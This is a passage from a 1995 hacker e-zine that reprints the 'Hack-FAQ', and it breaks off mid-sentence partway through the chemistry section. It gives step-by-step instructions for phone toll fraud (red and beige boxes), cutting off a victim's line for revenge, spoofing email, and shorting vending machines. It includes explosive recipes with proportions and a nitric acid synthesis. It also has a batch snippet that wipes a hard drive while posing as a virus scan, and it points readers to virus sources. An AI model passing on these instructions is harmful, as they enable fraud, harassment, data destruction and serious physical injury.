💾 Archived View for gemini.spam.works › mirrors › textfiles › magazines › ONESHOTS › hackers3 captured on 2022-06-12 at 13:47:15.

View Raw

More Information

-=-=-=-=-=-=-



			   -= H A C K E R S =-

			 Issue #3, October, 1995

			  Edited by:  Revolution                           
			 

			     Table Of Contents

  From the Editor . . . . . . . . . . . . . . . . . . . . . . . . Revolution

  The Hack-FAQ 2.06. . . . . . . . . . . . . . . . . . . Beliasarius and N P

  The Pursuit of Knowledge,  Notes on the Guild. . . . . . . . . . . . Route

  The LACC Mailing List  . . . . . . . . . . . . . . . . . . .Julian Assange

  2600 Meetings . . . . . . . . . . . . . . . . . . . . . . . . . . . FuSIoN

  Billwatch #18  . . . . . . . . . . . . . . Voters Telecommunications Watch

  A VMS Login Spoof . . . . . . . . . . . . . . . . . . . . . . . Talonphish

  Remote Host Probing. . . . . . . . . . . . . . . . . . . . . . . . IOERROR

  The End . . . . . . . . . . . . . . . . . . . . . . . . . . . . Revolution


----------------------------------------------------------------- -----------
copyright 1995 by Mike Scanlon All articles remain the property of their
authors, and may be reprinted with their permission.  This zine may be 
reprinted freely as a whole electronically, for hard copy rights mail the 
editor.  HACKERS is published monthly by Mike Scanlon, to be added to the 
subscription list or to submit articles mail scanlonr@delphi.com
----------------------------------------------------------------- -----------


				-= H A C K E R S =-

			      Issue #3,  File #1 of 9

				  From the Editor


	An amazing amount of things have gone on here at Hackers since last
issue.  I started college at NJIT, so you might notice that this issue is
coming from a different address.  I've kept my email address the same for
the time being, although if you send anything to mrs3691@hertz.njit.edu I
will receive it also.  Hackers has a new web page up, where issues are now
browsable in html form at http://hertz.njit.edu/~mrs3691.  There are no
graphics up as of yet, so don't expect anything much.
	
	NJIT is located in Newark New Jersey, so I'm local to all of NYC.  If
any of you attend the 2600 meetings in the Citicorp building, plan on seeing
me there in the future.  
	
	Alas, due to the increased workload, I've had to diminish my net
presence in recent weeks, but as I adjust I'll probably be on a little more.
In the near future, in fact, my comp sci class might set up a telnetable
BBS, so look for some cool things from that.  
	
	When I started this issue, I thought it might suffer because I did 
not have enough time to put into it, but a few good submissions turned that
around.  This month we have an essay on the guild from it's founding member,
a login spoof you can use with last month's VMS hacking article, and a couple
other cool articles.  The Hack-FAQ, although a good source of info for 
beginning hackers, is more of a sentimental article due to some things that
have been happening in the old ISCA crowd, such as the return of it's editor
to the scene, and the prospective return of a few other old friends.  Also,  
I'd like to take this chance to recommend everyone to subscribe to Billwatch.
Although issues of it have been cropping up in here for the last few issues,
if this is your only source of it, you are missing some very good 
information.  This issue it has some very good info on the state of the 
cryptography debate, which I think everybody should take at least a glance
at, so I decided to include it once again.

	Anyway, as always I've got to go and do some homework, so I hope you 
like this issue.  

					     - Revolution


As always, the standard disclaimer applies.  All of these articles are
provided for informational purposes only, Mike Scanlon and the respective 
authors cannot be held accountable for any illegal acts they are used to 
commit.



			     -= H A C K E R S =-

			   Issue #3,  File #2 of 9
 
			      +---------------+
			      | THE HACK-FAQ! |
			      | Edition  2.06 |
			      |  14 FEB 1994  |
			      +---------------+
 
 
 
		     "Knowledge is power" --Francis Bacon
		  "United we stand, divided we fall" --Aesop
 
 
 
			    <*>  Edited by  <*>
 
 
			    # Editor-in-Chief #
		  Belisarius <belsarus@cybernet.cse.fau.edu>
 
			     # Asst.  Editor #
		  Neurophire (on Shadow and N P on ISCA)
 
 
 
 
 
 
 
		     A MatrixMage Electronic Publication
		 With help from some members of KARMA/K.R.A.
 
 
 
 
 
Special Thanks to the Following Contributors:
Z Maestro     RA of ISCA Underground>
DINO          RA of Shadow Hack and Crack>
Artimage      RA of SKYNET Underground>
 
Faunus             Revolution
Matrixx            Amarand
Beelzebub          Redbeard
IO                 CyberSorceror
Doktor Nil         Skipster
CPT Ozone          Abort
Carsenio
 
 
 
 
Hi there, Hackers and Newbies alike!
 
We have compiled this, THE HACK-FAQ!, for all of you out there.
Please if you have any suggestions, contributions, criticisms, 
whatever, mail at the above addresses.
 
You might be wondering...where did edition 2.05 go?   Well before I
could get it out I got in a lot more good shit and decided to update
it again before sending it out.  To receive a copy of THE HACK-FAQ!
via E-mail then send E-mail to me at the address above.
 
THE HACK-FAQ! is a roughly monthly update and I am currently looking
for a site with LISTSERV capabilities.

Thanks and keep hacking!  Remember to keep working and to always try to
educate yourself and gather information.  If you're a newbie then read 
THE HACK-FAQ! first and use it as a springboard to start from.  If
you're a hacker then please contribute to this document.
 
				      -=> Belisarius <=-
 
Hey, to the CrackerJack crowd, keep struggling!!  You can make it above,
that's what I am beginning to do!  There is hope!  :)
				      ])> Neurophyre <([
 
 
Distribution of THE HACK-FAQ! is encouraged and promoted, as long as it  
is distributed as the entire file.  Keep up with latest editions.  
Look for the latest edition of THE HACK-FAQ! in every KARMA/K.R.A. 
Irregular Zine.
 
THE HACK-FAQ! is (c) of MatrixMage(tm) Publications. 
 
MatrixMage, THE HACK-FAQ!, Belisarius, Neurophyre, or any contributor 
are not responsible for any consequences.  You use this information at
your own risk.

 
 
 
 
 
 
 
 

CONTENTS
 
Sections
   I. Phone Fun (Red Boxing, COCOTS, Beige Boxing, Cellulars, etc)
  II. Fake E-Mail
 III. Salting Vending Machines
  IV. Explosives
   V. Virii
  VI. UNIX Passwords
 VII. Phucking with MS-DOS
VIII. Cracking programs
  IX. PGP / Data Encryption
   X. Chemistry (drugs and explosive/pyrotechnic component prep)
  XI. 'Cyberpunk'/Futuristic/Underground Culture
 
Appendices
   A. FTP sites with useful info
   B. Interesting Gophers
   C. Informative USENET Newsgroups
   D. Publications and Catalogs
   E. PGP Key Appendix
 

 
================================================================= ====
I. Phone Fun
 
WHAT IS A RED BOX AND HOW DO I MAKE ONE?
(from Doktor Nil)
 
First note: a redbox is merely a device which plays the tone a
payphone makes when you insert money. You just play it through the
mike on the handset. You would think that the Phone Co. would mute
the handset until you put a quarter in, and perhaps they are starting
to build phones like that, but I have yet to see one.
 
What you need:
- Radio Shack 33 memory Pocket Tone Dialer
- 6.4 - 6.5536 megahertz crystal (get 6.5 Mhz from Digikey, address
  below)
- A solder gun.
- Someone who can point out the crystal in the Tone
  Dialer.
 
Instructions:
1) Open up the back of the tone dialer. Use screwdriver.
 
2) Locate crystal. It should be toward the right side.
It will be smaller than the 6.5 Mhz one you bought, but otherwise
vaguely similar.  It is basically capsule-shaped, with two electrodes
coming out of the bottom which are soldered onto a circuit board.
It's on the _left_ side, basically the third large crystal thing from
the bottom, about 1.5 cm long, metallic, thin. 
 
3) De-solder, and de-attach, crystal. Heat the solder that the
crystal is seated in; remove crystal.
 
4) Attach 6.5 Mhz crystal. It is easiest just to use the solder which
is already there from the old crystal, that way there is less chance
of you dropping hot solder somewhere it shouldn't be and losing
everything. Heat first one drop of solder with the solder gun, and
seat one electrode of the 6.4 Mhz crystal in it, then do the same
with the other. This is the easiest part to mess up, be careful that
both drops of solder don't run together.
 
5) Put cover back on. you are done.
 
 
How to use: Five presses of the "*" key will make the quarter sound.
I think fewer presses make nickel/dime sounds, but I can't remember
specifically. Here in Michigan, you can simply hold it up to the
handset and press memory recall button 1 (where you have conveniently
recorded five *'s -read the tone dialer directions on how to do this)
and get a quarter credit, _IF_ you are calling LD. Keep making the
tone to get additional credits. There is a maximum number of credits
you can have at once.
 
To make a local call this may not work. You need to first put in a
real coin, then you can use the redbox for additional credits. There
may be a way around this, however: Call the operator, and ask her to
dial your number for you. She should do this without asking why, it
is a regular service. If you need an excuse, say the "4" key isn't
working, or something. She will ask you to insert your money. At
this point use the redbox. If all goes well, she dials your number
and you're in business. If she says "Will you do that one more time,"
or "Who is this," or any variations, hang up and walk away.
 
----------------------------------------------------------------- ----
 
WHAT DO THESE CRYSTALS LOOK LIKE?
In most cases, a rectangular metal can with two bare wires coming out
of one end, and a number like "6.50000" stamped on one side.
 
----------------------------------------------------------------- ----
 
WHAT IS THE BEST FREQUENCY FOR THE RADIO SHACK RED BOX CRYSTAL?
(from Matrixx)
6.49 is the actual EXACT crystal, 6.5 is more widely used, and 6.5536
is the easiest to find (Radio Shack)
 
----------------------------------------------------------------- ----
 
WHERE CAN I GET A CRYSTAL TO MAKE THE RED BOX?
The crystals are available from Digi-Key.  Call 1-800-DIGIKEY
(1-800-344-4539) for more info.  The part order number from
DIGI-KEY is x-415-ND
 
----------------------------------------------------------------- ----
 
WHAT ARE THE ACTUAL FREQUENCIES FOR REDBOX?
(from DINO)
For a Radio Shack conversion red box: a nickel is one * and a quarter
is 5 *s
 
Here are the freq's for a red box:
 
$.25 1700Hz & 2200Hz for a length of 33 milliseconds for each pulse
     with 33 millisecond pause between each pulse
$.10 1700Hz & 2200Hz 2 pulses at 66 milliseconds and with 66
     millisecond pauses
$.05 one pulse at the above freq's for 66 milliseconds!
 
----------------------------------------------------------------- ----
 
HOW DO YOU KNOW THAT THE PHONE IS A COCOT?
(from Faunus, Carsenio)
If it doesn't say "______ Bell" on it, it's probably a COCOT.  COCOT
is a general term for Customer owned or "Bell-independent" phone
companies.  Sometimes they are more shabbily constructed than real
fortress phones but others look about the same except for a lack of
phone company logo.
 
----------------------------------------------------------------- ----
 
FOOLING COCOTS USING 800 NUMBERS?
You call up an 800 number as any public phone HAS too let you dial
800 numbers for free.  Then you let the person who answers the 800
number hang up on you, THEN you dial your number that you want to
call free.  OK MOST COCOTs disable the keypad on the phone so you
CANT just dial the number, you have to use a pocket tone dialer to
dial the number.
 
----------------------------------------------------------------- ----
 
HOW DO I MAKE A BEIGE BOX?
(from Neurophyre)
Supplies: phone cord, soldering iron, solder, 2 INSULATED alligator
	  clips, ratchet wrench, 7/16-inch hex head
 
1. Cut off the head on one end of the phone cord.
2. Strip the coating.
3. Look for the red wire, and the green wire.
4. Mark one clip green and put it on the green.
5. Mark the other red and put it on the red.
6. Once you have them soldered and insulated, plug the other end
   (that still has the head) into a phone.
7. Go out in the daytime and look for green bases, green rectangular
   things sticking about 3 feet out of the ground with a Bell logo on
   the front.  If you're a retard, you'll waste your time with a
   cable company box or something.  I've heard of it.
8. Come back to a secluded one at night.  With the wrench, open it
   up.
9. Find a set of terminals (look like the scored [the "screwy end"]
   end of bolts in my area) with what should be a red wire and a
   green wire coming off them.
10. Plug in your beige box red to red and green to green, pick up the
    phone and dial away!
    
Modems work too as well as taps and shit.  You're using someone
else's line (unless you're an idiot) to get phone service.  Don't
abuse the same line after the phone bill comes.
 
----------------------------------------------------------------- ----
 
			 BEIGE BOXING 101
			 Phield Phreaking
			   by Revolution
 
     At the beginning of the section in the Bell training manual
entitled "One million ways to catch and phry a phreak" it dosen't
have a disclaimer saying "for informational purposes only".  So why
the hell should I put one here?  Give this phile to whoever the fuck 
you want, just make sure it all stays together, same title, same 
byline.
 
     Phield phreaking gives you everything you've ever wanted: free
long distance calls, free teleconferencing, hitek revenge, anything
you can do from your own fone line and more, without paying for it,
or being afraid of being traced.  Just be ready to bail if you see
sirens.
 
How to make a beige box: Easiest box to make.  Cut your fone cord
before the jak, strip the wires a little.  You should see a red
(ring) wire and a green (tip) wire.  If you see yellow and black
wires too just ignore them.  Put one set of alligator clips on the
red wire and one on the green wire, and you're set.  (You want to
use your laptop computer, but you don't want to ruin your modem's
fone cord?  Just unscrew a jak from a wall, unscrew the 4 screws on
the back, and do the same thing as above. Now you can use a fone,
laptop, your mom, anything you can plug in a jak.)
 
How to use: What you have is a lineman's handset.  You can use it
from any bell switching apparatus (from now on sw. ap.).  These are
on fone poles, where your fone line meets your house, and near
payfones.  I'll go into detail below, but basically just open any
box on a telefone pole, and you'll see sets of terminals (screws),
with wires wrapped around them, just like on the back of a fone
jak.  These screws are where you need to attach your alligator
clips to get a dial tone.  Don't unscrew the screw, you'll just
phuck up some poor guys line, and increase your chances of getting
caught.  After the wire goes around the screw, it normally twists
off into the air.  Put your clip on the end of the wire.  Do the
same with the other clip.  If you don't get a dial tone, then
switch terminals.
 
On telefone poles:
 
TTI terminals: These must have been built by phreaks, just for
beige boxing.  By far the easiest sw. ap. use.  The only drawback
is that they only connect to one fone line.  These are the fist
sized gray or black boxes that appear where a single fone line
meets the mother line.  They look almost like outdoor electric
sockets, that have the snap up covering. They normally have the
letters TTI somewhere on the front.  No bolts or screws to take
off, just snap up the top and you will see four screws.  Clip in  
and happy phreaking.  Just click the top down and no one will ever
know you were there (except for the extra digits on their fone
bill.)
 
Green trees:  just about the hardest sw. ap. to beige from (tied
with the bell canister) but if its the only one you can use, go for
it.  These are the 3 foot high green/gray metal columns that are no
wider than a telefone pole (which makes them different then the
green bases, see below), that say "Call before digging, underground
cable," or the real old ones just have a bell sign.  Usually green
trees are right at the base of fone poles, or within a foot or two
of them.  These normally have two 7/16 bolts on one side of the
column, which have to be turned 1/8 a turn counterclockwise, and
the front of the base will slide off.  Now you will see a sheet of
metal with a few square holes in it, that has a bolt where the
doorknob on a door would be.  Ratchet this one off and the metal
sheet will swing open like a door.  On one side of the sheet will
be a paper with a list of #'s this tree connects to.  Inside you'll
see a mass of wires flowing from gray stalks of plastic in sets of
two. The whole mass will have a black garbage bag around it, or
some type of covering, but that shouldn't get in the way.  The
wires come off the gray stalk, and then attach to the screws that
you can beige from, somewhere near the ground at the center of the
tree. These are on a little metal column, and sometimes are in a
zig zag pattern, so its hard to find the terminals that match in
the right order to give you a dial tone.
 
Green bases: The gray/green boxes you see that look just like green
trees, except they are about twice or three times as wide.  They
open the same as trees, except there are always 4 bolts, and when
the half slides off, inside is a big metal canister held together
with like 20 bolts.  I wouldn't open it, but with a little info
from phriends and some social engineering, I learned that inside is
where two underground fone lines are spliced together.  Also inside
is either pressurized gas or gel.  Pretty messy.
 
Bell canisters:  attached to fone poles at waist level.  They are
green (or really rusted brown) canisters about a two feet tall that
have a bell insignia on the side. They will have one or two bolts
at the very bottom of the canister, right above the base plate.
Take the bolts off and twist the canister, and it'll slide right
off.  Inside is just like a green tree, except there normally isn't
the list of #'s it connects to.
 
Mother load: Largest sw. ap.  A large gray green box, like 6x4,
attached to a telefone pole about three feet off the ground.  a big
(foot or two diameter) cable should be coming out the top. 
Somewhere on it is a label "MIRROR IMAGE CABLE".  It opens like a
cabinet with double doors.  Fasteners are located in the center of
the box and on the upper edge in the center.  Both of these are
held on with a 7/16 bolt.  Take the bolts off, and swing the doors
open.  On the inside of the right door are instructions to connect
a line, and on the inside of the left door are a list of #'s the
box connects to.  And in the box are the terminals. Normally 1,000
fones (yyy-sxxx, where yyy is your exchange and s is the first
number of the suffix, and xxx are the 999 fones the box connects
too). 
 
On houses: follow the fone line to someone's house, and then down
there wall.  Either it goes right into there house (then you're
screwed) or it ends in a plastic box.  The newer boxes have a screw
in the middle, which you can take off with your fingers, and then
put the box back on when you're done, but the older ones are just
plastic boxes you have to rip off.  Inside are 4 terminals, yellow,
black, and red and green, the two you need.  Find the Christmas
colors, and phreak out.
 
On payfones: follow the fone line up from the fone, and sometimes
you'll find a little black box with two screws in it.  Undo this,
and you'll find a nice little fone jak. You don't even need your
beige box for that one.  If there's not one of those,
 follow the
wire to a wall it goes into, and sometimes there'll be a sw. ap.
like those on houses (see above).  Payfones are normally pretty
secure now though, and you probably won't find any of those.
 
Phreaky things you can do:  Jesus, do I have to tell you L/-\m3rs
everything? Anyway, free long distance calls should be pretty easy,
and get teleconferencing info from somebody else, just make sure
you ANI the # you're calling from before calling Alliance.
 
Hitek revenge!
Possibilities are endless, you have total control of this lamers
line.  Most of you guys are probably way to 3l33+ for this one, but
you can disconnect his line by loosening a few screws and ripping
his wires at any sw. ap. but here's something alot better:  Get the
faggots number, and then find the mother load sw. ap. it connects
to (not the sw. ap. on his house or on the telefone pole in his
drive way, the _mother_load_) Find his # in the terminals, and then
connect the two termianls with a paper clip, alligator clip, even
your mother's pussylips!  His fone will be busy until ma bell
figures out what the hell is going on, and since the last place
they look is the mother load, this usually is at least a week. 
Then, of course, is the funniest prank:  Beige box from a major
store, like Toys R Us (that's my favorite) and call up ma bell
"Yeah, I'd like all calls to this number forwarded to (asshole's
#)" 
 
That's it.  Reach me as Revolution on ISCA, Cyberphunk on Shadow,
phunk on IRC, or Revolution on Delphi.  Any phreaks out there who
got new info, war stories or some addictive disorder and just need
somebody to talk to, email revolution@delphi.com no PGP needed.
 
----------------------------------------------------------------- ----
 
HOW CAN YOU INTERCEPT CELLULAR PHONE CONVERSATIONS?
(from CPT Ozone)
You can intercept most cellular phone signals on any old radio that
pulls in police and air bands?  Look for them at garage sales and
junk yards.
 
----------------------------------------------------------------- ----
 
WHAT PHONE NUMBER AM I CALLING FROM?
(from Skipster, et al)
 
This service is called ANI.
 
This number may not work, but try it anyway:
(800) 825-6060
 
You might want to try is dialing 311 ... a recorded message tells you
your phone #.  Experiment, but 311 does work, if it doesn't and an
operator picks up, tell her that you were dialing information and
your hand must have slipped. 
 
----------------------------------------------------------------- ----
 
HOW DO I USE/DO ALLIANCE TELECONFERENCING?
(from Neurophire, Carsenio)
Set one of these up, it is a 1-800 dial-in conference.  Then, grab
your beige box, go to some business, preferably something like a
Wal-Mart or a Radio Shack and beige box off their line.  Then call
and set up a teleconference for whenever to be billed to the line
you are calling from.  You'll want to know specifically what to ask
for. Alliance teleconferencing is 0-700-456-1000.
Dial the number (you're of course paying for this by the minute)
and you get automated instructions on how to chhose the number of
ports for your conference call, and how to dial each participant..  
 
================================================================= ====
II. Fake E-mail
 
HOW DO I MAKE FAKE MAIL (OR HOW DO I FOOL SMTP)?
(from Beelzebub, Doktor Nil)
 
1.  Telnet to port 25 of any internet server (eg oberlin.edu 25)
2.  If at all possible, AVOID TYPING "HELO".  Type mail from:(fake name)
3.  Type rcpt to:(person who gets mail)
4.  The mail server should ok each time after each name.  
5.  If it does not: 
     a) type vrfy and then the name of the person
     b) as a last resort use helo, this will login your computer as
	having been the source of the mail
6.  Retype the commands, it should say ok now.
7.  Type data
8.  Enter your letter
9.  To send letter type a "." on an empty line.
10. Then type quit
11. This is traceable by any sysadmin ... don't harass people this 
    way.
12. If the person receiving the mail uses a shell like elm he/she
    will not see the telltale fake message warning
    "Apparently-To:(name)" even if not, most people wouldn't know
    what it means anyway.
13. Make sure you use a four part address somebody@part1.pt2.pt3.pt4
    so as to make it look more believable and cover any addons the
    mail routine might try
14. Put a realistic mail header in the mail message to throw people
    off even more.  If there are To: and Date: lines then the program
    probably won't add them on.
15. Also try to telnet to the site where the recipient has his
    account.  This works better if you know how to fool it.
 
================================================================= ====
III. Salting vending machines
 
WHAT DOES SALTING VENDING MACHINES DO?
When you take concentrated salt water (a high concentration of salt)
and squirt it into the change slot (preferably where the dollar 
bills come in, though some say it doesn't matter), the salt will
short circuit the machine and out will pour change and hopefully 
sodas.
 
================================================================= ====
IV. Explosives
 
FLASH POWDERS:
(from Neurophyre)
 
 
Materials: Powdered magnesium, powdered potassium nitrate
1. Mix 1 part powdered magnesium and 4 parts of powdered potassium 
   nitrate. 
2. Light it with a long fuse cuz its so bright it might screw up your
   eyes. 
   
 REAL Cherry Bomb Powder
    4 parts by weight of potassium perchlorate
    1 part by weight of antimony trisulfide     (if you can find
    1 part by weight aluminum powder            regular antimony sulfide
						contact Neurophyre!)
 
Relatively Safe
    3 parts by weight of potassium permanganate
    2 parts by weight of aluminum powder
 
 
 *VERY* Shock/Friction/Static/Heat Sensitive!
 Use only if suicidal or desperate!
    4 parts by weight of potassium chlorate
    1 part by weight of sulfur
    1 part by weight of aluminum powder
 
1) To use these mixtures, SEPARATELY pulverize each ingredient into a
fine powder, the finer it is, the more power you get.  Use a mortar and
pestle if available, and grind GENTLY.  Do not use plastic as this can
build a static charge.  Remember, do them SEPARATELY.
 
----------------------------------------------------------------- ----
 
AMATEUR EXPLOSIVE (Ammonium Triiodide):
(from IO)
WARNING:  This explosive is EXTREMELY shock sensitive when dry, and
moderately sensitive when wet!!!  AVOID IT when dry!  DO NOT store!
The purplish iodine vapor this produces during the explosion will stain
and corrode!
1) Take a small plastic bucket, add 3-4 inches of household ammonia. 
   This bucket will never be clean again, in all likelihood.
   Try to get clear (non-pine, non-cloudy) ammonia.  Or use an
   ammonium hydroxide solution from a chemlab.  This results in better
   but more sensitive, and therefore dangerous crystals.
2) Drop in iodine (like you use on scratches) one drop at a time, or,
   preferably, use crystals of iodine.
3) Let it settle, then pour it through a piece of cloth, discarding
   the runoff.
4) Squeeze *gently* to get out excess liquid.
5) Mold it onto the thing you want to blow up, stand **way** back.
6) Wait for it to dry, and throw a rock at it.
 
================================================================= ====
V. Virii
 
WHERE CAN I GET SOME VIRII?
The Virus eXchange BBS in Bulgaria.  [number not available - :( ]
You can't get busted for anything having to do with this BBS.
 
Problem:  They demand a virus they don't have in their archives to
let you in.  Good luck finding one.  The best way is to write one,
even if it's in BASIC. It'll probably get you in.  They have
THOUSANDS of virii.  IBM, Mac, Amiga, ... And they accept 2400 bps
from what I know! For more info, gopher to wiretap.spies.com and dig
around in their online library under technical info.
 
----------------------------------------------------------------- ----
 
INTS USED:
(from Belisarius)
You want Int 18h, AH=03h,
Al==Num sectors to write
BX==offset of pointer to buffer
CH=cylinder Number
Cl=sector number
DX=head number
Dl=drive numbers
ES=segment of pointer with buffer
 
for CH=it's the low 8 bits of 10 bit cylinder number,
for CL=cylinder/sectornubmer, bits 6,7=cylindernumber(high 2 bits),
				   0-5=sector number.
for DL=bit 7 = 0 for floppy, 1 for fixed drive upon return: 
AH=status, AL=number of sectors written flags, carry set if an error.

================================================================= ====
VI. Unix
 
HOW IS THE UNIX PASSWORD FILE SETUP?
(from Belisarius)
The password file is usually called /etc/passwd
Each line of the passwd file of a UNIX system follows the following
format:
 
 
    userid:password:userid#:groupid#:GECOS field:home dir:shell
 
 
What each of these fields mean/do---
 
userid       -=>  the userid name, entered at login and is what the
		  login searches the file for.  Can be a name or a
		  number.
 
password     -=>  the password is written here in encrypted form.
		  The encryption is one way only.  When a login
		  occurs the password entered is run thru the
		  encryption algorithm (along with a salt) and then
		  contrasted to the version in the passwd file that 
		  exists for the login name entered.  If they match,
		  then the login is allowed.  If not, the password is
		  declared invalid.
 
userid#      -=>  a unique number assigned to each user, used for
		  permissions
 
groupid#     -=>  similar to userid#, but controls the group the user
		  belongs to.  To see the names of various groups 
		  check /etc/group
 
GECOS FIELD  -=>  this field is where information about the user is
		  stored.  Usually in the format  full name, office
		  number, phone number, home phone.  Also a good
		  source of info to try and crack a password.
 
home dir     -=>  is the directory where the user goes into
		  the system at (and usually should be brought
		  to when a cd is done)
 
shell        -=>  this is the name of the shell which is 
		  automatically started for the login
 
Note that all the fields are separated by colons in the passwd file.
 
----------------------------------------------------------------- ----
 
WHAT DO THOSE *s, !s, AND OTHER SYMBOLS MEAN IN THE PASSWD FILE?
(from Belisarius)
Those mean that the password is shadowed in another file.  You have
to find out what file, where it is and so on.  Ask somebody on your
system about the specifics of the Yellow Pages system, but 
discretely!
 
----------------------------------------------------------------- ----
 
WHAT IS A UNIX TRIPWIRE?
(from Belisarius)
Tripwire is a tool for Unix admins to use to detect password cracker
activity, by checking for changed files, permissions, etc.  Good for
looking for trojan horses like password stealing versions of 
telnet/rlogin/ypcat/uucp/etc, hidden setuid files, and the like.
 
USING SUID/GUID PROGS TO FULL ADVANTAGE.
(from Abort)
A SUID program is a program that when executed has the privs of the 
owner.
A GUID has the privs of the group when executed.
Now imagine a few things (which happen often in reality):
1.  Someone has a SUID program on their account, it happens to allow
a shell to, like @ or jump to a shell.  If it does that, after you
execute said file and then spawn a shell off of it, all you do 
in that shell has the privs of that owner.
2. If there is no way to get a shell, BUT they leave the file
writable, just write over it a script that spawns a shell, and you
got their privs again.
 
================================================================= ====
VII. Phucking with MS-DOS
 
HOW TO REALLY **ERASE** A HARDDRIVE
(from Amarand)
Install a small program (in the Dos directory would be good) called
Wipe, by Norton Utilities.  I am pretty sure that executing this
program, using the proper command line options, you can for one
better than formatting the hard drive.  Wiping the information
changes each bit in the object (file, FAT, disk, hard drive) to a
zero...or a random bit, or an alternating bit instead of just
deleting the reference to it in the file allocation table.  If you
just delete a file, or format a hard drive...with the new Dos you 
would only need to let it run its course and then Unformat the drive.  
Wipe, I have found, works much more effectively by first erasing the
file allocation table AFTER erasing the information the file 
allocation table is used to find.
 
----------------------------------------------------------------- ----
 
WRITING A .bat FILE TO 'WIPE' A DRIVE.
Add the following code to the end of autoexc.bat:
echo Please wait
echo Checking HardDisk for virii, this make take a while ...
wipe > nothing.txt
 
This prevents any output from Wipe being output.
 
 
================================================================= ====
VIII. Cracking Programs
 
WHAT ARE PASSWORD CRACKING PROGRAMS?
(from Belisarius)
There are three main cracking programs.  They are Crack, Cracker Jack
and Cops.  The latest versions are 4.1 for Crack and 1.4 for Cracker
Jack.  Crack and COPS run on UNIX and CJack runs on a PC. CJack1.3
runs on any x86 class and CJack1.4 needs at least a 386.  To use any
of these requires access to an unshadowed password file.
They are not programs that try to login to an account.  They take the
password file (/etc/passwd in UNIX is usually the name) and guess the
passwords.
 
----------------------------------------------------------------- ----
 
WHERE CAN I GET THESE PROGRAMS?
(from Redbeard)
Crack , CrackerJack, and COPS at 
ftp plaza.aarnet.edu.au  
in the /secutiry/cert directory
 
WHAT IS WPCRACK?
WPCRAK is a cracker to break the encryption on WordPerfect files.
It works, but takes a long time to run.
 
----------------------------------------------------------------- ----

WHAT IS PKCRACK?
PKCRACK is a dictionary cracker for PKZIP.  It works.  It's 
dictionary, but it works.  Not all that well, as you may have to sift
through multiple possible passwords, but its better than nothing.
Look for it at ftp plains.nodak.edu
 
================================================================= ====
IX. PGP / Data Encryption
 
WHAT IS PGP?
(from Belisarius)
PGP stands for Pretty Good Protection, from a company called Pretty
Good Software.  It is a public key encryption program for MS-DOS,
Unix, and Mac.  You create a key pair.  One private (secret) key
and a public key.  The keys are different parts of the whole.  I
distribute my public key and anyone who wants can grab it ad it to
their PGP keyring.  Then when they want to send me a message they
encrypt it with PGP and my public key and then send it.  Only I can
decrypt it because you need my secret key to decode it.  (Trust me
you won't get my secret key)  That is PGP.  Please use it if you
want to communicate anything of a ahhhh....sensitive manner.
 
----------------------------------------------------------------- ----
 
WHERE CAN I GET PGP?
(from an archie search)
 
FTP sites for PGP=Pretty Good Privacy Public Encryption System
--------------------------------------------------------------
 
========
Unix PGP
========
 
Host 130.149.17.7
Location: /pub/local/ini/security
	   FILE -rw-rw-r--     651826  Apr  5 1993  pgp22.tar.Z
 
Host arthur.cs.purdue.edu
Location: /pub/pcert/tools/unix/pgp
	   FILE -r--r--r--     651826  Mar  7 1993  pgp22.tar.Z
 
Host coombs.anu.edu.au
Location: /pub/security/cypher
	   FILE -r--r--r--     651826  Nov  4 22:28  pgp22.tar.Z

Host dutepp0.et.tudelft.nl
Location: /pub/Unix/Security
	   FILE -rw-rw-r--     651826  Oct  4 12:40  pgp22.tar.Z
 
Host isy.liu.se
Location: /pub/misc/pgp/2.2
	   FILE -rw-r--r--     651826  Mar 10 1993  pgp22.tar.Z
 
Host lhc.nlm.nih.gov
Location: /pub/hunter
	  FILE -rw-r--r--     651826  Jun 30 00:00  pgp22.tar.Z
 
 
==========
MS-DOS PGP
==========
 
Host zero.cypher.com
Location: /pub/pgp
	   FILE                                       pgp23a.zip
 
================
MS-DOS PGP SHELL
================
 
Host athene.uni-paderborn.de
Location: /pcsoft/msdos/security
	   FILE -rw-r--r--      65160  Aug  9 20:00  pgpshe22.zip
 
Host nic.switch.ch
Location: /mirror/msdos/security
	   FILE -rw-rw-r--      65160  Aug  9 22:00  pgpshe22.zip
 
Host pc.usl.edu
Location: /pub/msdos/crypto
	   FILE -rw-r--r--      65160  Sep  1 15:42  pgpshe22.zip
 
Host plains.nodak.edu
Location: /pub/aca/msdos/pgp
	   FILE -rw-r--r--      65430  Nov 26 18:28  pgpshe22.zip
 
Host plaza.aarnet.edu.au    
Location: /micros/pc/garbo/pc/crypt
	   FILE -r--r--r--      65430  Aug  3 11:40  pgpshe22.zip
Location: /micros/pc/oak/security
	   FILE -r--r--r--      65160  Aug  9 20:00  pgpshe22.zip
 
 
=======
Mac PGP
=======
 
Host plaza.aarnet.edu.au
Location: /micros/mac/info-mac/util
	   FILE -r--r--r--     323574  Apr 26 1993  pgp.hqx
 
Host sics.se
Location: /pub/info-mac/util
	   FILE -rw-rw-r--     323574  Nov  5 11:20  pgp.hqx
 
Host sumex-aim.stanford.edu
Location: /info-mac/util
	   FILE -rw-r--r--     323574  Apr 26 1993  pgp.hqx
 
================================================================= ====
X.  CHEMISTRY
(from Neurophire)
 
/*\*/*\*/*\*/*\*/*\*/*\*/  COMING SOON  /*\*/*\*/*\*/*\*/*\*/*\*/
 
How to cheaply make Potassium Chlorate!  Easily!  KClO3 is an
ingredient in some plastic explosives and in unstable flash powders,
as well as incendiary powders, bricks, and quick and dirty smoke mix!
 
 
HOW TO MAKE NITRIC ACID:
 
Nitric acid is not TOO expensive, but is hard to find except from
chemical supply houses.  Purchases can be traced.(From TBBOM13.TXT)
 
There are several ways to make this most essential of all acids for
explosives. One method by which it could be made will be presented.
again, be reminded that these methods SHOULD NOT BE CARRIED OUT!!
 
     Materials:                             Equipment:
     ----------                             ----------
     sodium nitrate or                      adjustable heat source
     potassium nitrate
					    retort
     distilled water
					    ice bath
     concentrated
     sulfuric acid                          stirring rod
 
					    collecting flask with 
					    stopper
 
1) Pour 32 milliliters of concentrated sulfuric acid into the retort.
 
2) Carefully weigh out 58 grams of sodium nitrate, or 68 grams of
potassium nitrate. and add this to the acid slowly.  If it all does
not dissolve, carefully stir the solution with a glass rod until
it does.
 
3) Place the open end of the retort into the collecting flask, and
place the collecting flask in the ice bath.
 
4) Begin heating the retort, using low heat.  Continue heating until
liquid begins to come out of the end of the retort.  The liquid that
forms is nitric acid.  Heat until the precipitate in the bottom of
the retort is almost dry, or until no more nitric acid is forming.
CAUTION: If the acid is heated too strongly, the nitric acid will
decompose as soon as it is formed.  This can result in the 
